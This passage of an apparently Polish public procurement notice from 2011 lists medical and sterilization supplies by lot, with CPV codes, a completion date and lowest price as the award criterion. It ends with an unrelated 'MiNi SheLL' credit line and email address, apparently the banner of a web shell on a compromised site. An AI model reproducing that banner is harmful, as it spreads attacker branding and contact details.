poz. 50 - Pudełko na zużyte igly/implanty, produkowane ze sztywnego polipropylenu. Jednokierunkowa klapa zabezpieczająca, która zapewni ochronę przed zanieczyszczeniami i wydostaniem się zużytych igieł. Łatwość identyfikacji oznaczenia wskazujące na niebezpieczne odpady biologiczne - szerokie, 0,5l
poz. 51 - Pojemnik na badania histopatologiczne zakręcany, szeroki otwór, poj. 200ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakres V - Sprzęt i materiały do sterylizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza składanie ofert na poszczególne pozycje w tym zakresie. Poz. 1 - a) Metkownica dwurzędowa alfanumeryczna
	b) Wałek z tuszem do metkownicy dwurzędowej alfanumerycznej
	c) Etykiety 2-liniowe, ze wskaźnmikiem chemicznym klasy A, potwierdzające ekspozycje z czynnikiem sterylizującym. Dające możliwość oznaczenia pakietów i uzupełnienie dokumentacji o sterylizowanym pakiecie (1125 szt. na rolce) - do metkownicy dwurzędowej alfanumerycznej
Poz. 2 - Kuweta do dezynfekcji narzędzi chirurgicznych, poj. 8-10l
Poz. 3 - Kuweta do dezynfekcji narzędzi chirurgicznych, poj. 11-15l
Poz. 4 - Papier krepowany (120x120cm) naprzemiennie pakowany arkusz zielony i niebieski, gramatura min. 60g/m2, miękki, do stosowania w sterylizacji parą wodną, tlenkiem etylenu, wytrzymały na rozciąganie na sucho i mokro
Poz. 5 - Papier krepowany (90x90cm) naprzemiennie pakowany arkusz zielony i niebieski, gramatura min. 60g/m2, miękki, do stosowania w sterylizacji parą wodną, tlenkiem etylenu, wytrzymały na rozciąganie na sucho i mokro
Poz. 6 - Papier krepowany (60x60cm) kolor niebieski, miękki, do stosowania w sterylizacji parą wodną, tlenkiem etylenu, wytrzymały na rozciąganie na sucho i mokro
Poz. 7 - Papier krepowany (40x40cm) naprzemiennie pakowany arkusz zielony i niebieski, gramatura min. 60g/m2, miękki, do stosowania w sterylizacji parą wodną, tlenkiem etylenu, wytrzymały na rozciąganie na sucho i mokro.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com